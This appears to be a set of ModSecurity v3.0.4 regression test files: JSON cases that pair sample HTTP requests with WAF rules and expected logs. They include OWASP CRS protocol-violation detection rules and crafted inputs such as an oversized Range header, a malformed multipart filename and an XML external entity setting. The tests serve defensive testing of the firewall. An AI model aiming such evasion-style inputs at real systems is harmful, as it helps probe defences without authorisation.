"client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value&a=b", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"24." }, "rules":[ "SecRuleEngine On", "SecRule ARGS_COMBINED_SIZE \"@gt 10 \" \"id:1,pass\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_COMBINED_SIZE - POST (3/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"25." }, "rules":[ "SecRuleEngine On", "SecRule ARGS_COMBINED_SIZE \"@gt 10 \" \"id:1,phase:3,pass\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_COMBINED_SIZE - POST (4/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "28", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2&a=b\n" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"28." }, "rules":[ "SecRuleEngine On", "SecRule ARGS_COMBINED_SIZE \"@gt 10 \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_COMBINED_SIZE - POST (5/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "a=%EC%A7%84%20%EB%A7%88%EC%9D%BC%20%EB%A6%AC" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"16." }, "rules":[ "SecRuleEngine On", "SecRule ARGS_COMBINED_SIZE \"@gt 10 \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_COMBINED_SIZE - GET (6/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/?z=%EC%A7%84%20%EB%A7%88%EC%9D%BC%20%EB%A6%AC", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"15." }, "rules":[ "SecRuleEngine On", "SecRule ARGS_COMBINED_SIZE \"@gt 10 \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_COMBINED_SIZE - GET (7/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/?z=진 마일 리", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"15." }, "rules":[ "SecRuleEngine On", "SecRule ARGS_COMBINED_SIZE \"@gt 10 \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-ARGS.json0000644000175000017500000001523613607066010025137 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS - GET (1/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"other_value\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS - GET (2/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS - POST (3/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value1\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS - POST (4/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value2\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS - POST (5/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1=morevalue1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value1=morevalue1\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS - POST (6/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1=morevalue1¶m2=value2¶m3=" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"\" \\(Variable: ARGS:param3\\)" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:param3 \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS - POST (7/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1=morevalue1¶m2=value2&&&&&" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value2\" \\(Variable: ARGS:param2\\)" }, "rules":[ "SecRuleEngine On", "SecRule ARGS:param2 \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/transformations.json0000644000175000017500000000756713607066010026061 0ustar zimmerlezimmerle[ { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "Testing transformations :: pass,t:trim", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com", "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": " t:trim: \"test\"", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "Testing transformations :: pass,t:trim,t:lowercase", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com", "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= WHEE ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": "lowercase: \"test", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test \" \"id:1,pass,t:trim,t:lowercase\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/transformation-none.json0000644000175000017500000000774213607066010026626 0ustar zimmerlezimmerle[ { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "Testing transformations :: t:none", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com", "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": "Target value: \"rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: REQUEST_COOKIES:PHPSESSID\\)", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule REQUEST_COOKIES \"@contains test \" \"id:1,t:lowercase,t:none\"" ] }, { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "Testing transformations :: t:none", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com", "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": "raaaaaaa2t5uvjq435r4q7ib3vtdjq120", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule REQUEST_COOKIES \"@contains test \" \"id:14,t:none,t:lowercase\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/secruleengine.json0000644000175000017500000000361713607066010025450 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Disruptive actions (1/n)", "expected":{ "debug_log": " Running action deny", "http_code":403 }, "rules":[ "SecRuleEngine On", "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'900001',phase:request,nolog,status:403,t:none,block\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Disruptive actions (2/n)", "expected":{ "debug_log": "Rule engine disabled, returning...", "http_code":200 }, "rules":[ "SecRuleEngine On", "SecRuleEngine Off", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,t:none,block\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Disruptive actions (3/n)", "expected":{ "http_code":200 }, "rules":[ "SecRuleEngine On", "SecRuleEngine DetectionOnly", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,nolog,block,t:none,block\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Disruptive actions (4/n)", "expected":{ "debug_log": "Rule engine disabled, returning...", "http_code":200 }, "rules":[ "SecRuleEngine On", "SecRuleEngine Off", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,t:none,block\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Disruptive actions (5/n)", "expected":{ "debug_log": "Rule engine disabled, returning...", "http_code":200 }, "rules":[ "SecRuleEngine On", "SecRuleEngine Off", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,block,t:none,block\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/secmarker.json0000644000175000017500000001061313607066010024566 0ustar zimmerlezimmerle[ { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "SecMarker 1", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com", "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": "Target value: \"test", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"phase:2,id:1,t:trim\"", "SecAction \"phase:2,nolog,pass\"", "SecMarker HERE_GOES_A_MARKER", "SecRule ARGS \"@contains test\" \"phase:2,id:2,t:trim\"" ] }, { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "SecMarker 2", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com", "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": "Out of a SecMarker after skip 6 rules.", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"phase:2,id:1,t:trim,skipAfter:HERE_GOES_A_MARKER\"", "SecRule ARGS \"@contains test1\" \"phase:2,id:2,t:trim\"", "SecRule ARGS \"@contains test2\" \"phase:2,id:3,t:trim\"", "SecRule ARGS \"@contains test3\" \"phase:2,id:4,t:trim\"", "SecRule ARGS \"@contains test4\" \"phase:2,id:5,t:trim\"", "SecAction \"phase:2,nolog,pass\"", "SecMarker HERE_GOES_A_MARKER", "SecRule ARGS \"@contains test5\" \"phase:2,id:6,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/secaction.json0000644000175000017500000000371313607066010024565 0ustar zimmerlezimmerle[ { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "sec action", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "net.tutsplus.com", "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "text\/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected": { "audit_log": "", "debug_log": "Executing unconditional rule", "error_log": "" }, "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"phase:2,id:1,t:trim\"", "SecAction \"phase:2,nolog,pass\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/sec_component_signature.json0000644000175000017500000000260113607066010027525 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "version_max":0, "title":"SecComponentSignature", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { "Host": "www.modsecurity.org", "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", "Cache-Control": "no-cache" }, "uri": "\/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, "body": "" }, "response": { "headers": { "Content-Type": "plain\/text\n\r" }, "body": [ "test" ] }, "expected":{ "audit_log":"", "debug_log":".*", "error_log":"", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecComponentSignature \"OWASP_CRS/2.2.9\"", "SecRule ARGS \"@contains test\" \"id:1,t:trim,deny,status:403,auditlog\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/rule-920274.json0000644000175000017500000000302313607066010024323 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Byte ranges :: OWASP CRS id:920274", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "Test": "ThisIsATest%60" }, "uri":"/", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code":400, "debug_log":"Invalid character in request headers" }, "rules":[ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,block,status:400,log\"", "SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie \"@validateByteRange 32,34,38,42-59,61,65-90,95,97-122\" \"id:920274,phase:2,block,t:none,t:urlDecodeUni,msg:'Invalid character in request headers (outside of very strict set)',logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-protocol',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',tag:'paranoia-level/4',ver:'OWASP_CRS/3.1.0',severity:'CRITICAL',setvar:'tx.msg=%{rule.msg}',setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}',setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{MATCHED_VAR_NAME}=%{MATCHED_VAR}'\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/rule-920200.json0000644000175000017500000000311113607066010024306 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Byte ranges :: OWASP CRS id:920200", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept-Language":"en-us,en;q=0.5", "Accept":"*/*", "Keep-Alive":"300", "Range": "bytes=1-10,11-20,21-30,31-40,41-50,51-60" }, "uri":"/", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code":400 }, "rules":[ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,block,status:400,log\"", "SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range \"@rx ^bytes=(?:(?:\\d+)?\\-(?:\\d+)?\\s*,?\\s*){6}\" \"id:920200,phase:2,block,t:none,msg:'Range: Too many fields (6 or more)',logdata:'%{MATCHED_VAR}',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-protocol',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',tag:'paranoia-level/2',ver:'OWASP_CRS/3.1.0',severity:'WARNING',chain", "SecRule REQUEST_BASENAME \"!@endsWith .pdf\" \"setvar:'tx.msg=%{rule.msg}',setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}',setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{MATCHED_VAR_NAME}=%{MATCHED_VAR}'\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/rule-920120.json0000644000175000017500000000450613607066010024320 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: OWASP CRS id:920120", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept-Language":"en-us,en;q=0.5", "Accept":"*/*", "Content-Length":"411", "Content-Type":"multipart/form-data; boundary=---------------------------265001916915724", "Proxy-Connection":"keep-alive", "Keep-Alive":"300" }, "uri":"/", "method":"POST", "body": [ "-----------------------------265001916915724\r", "Content-Disposition: form-data; name=\"fi;le\"; filename=\"test\"\r", "Content-Type: application/octet-stream\r", "\r", "Rotem & Ayala\r", "\r", "-----------------------------265001916915724\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "tt2\r", "-----------------------------265001916915724\r", "Content-Disposition: form-data; name=\"B1\"\r", "\r", "Submit\r", "-----------------------------265001916915724--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code":400 }, "rules":[ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,block,status:400,log\"", "SecRule FILES_NAMES|FILES \"@rx (?", " ", " ", " ", " 12123", " ", " ", "" ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecXMLExternalEntity On", "SecRule 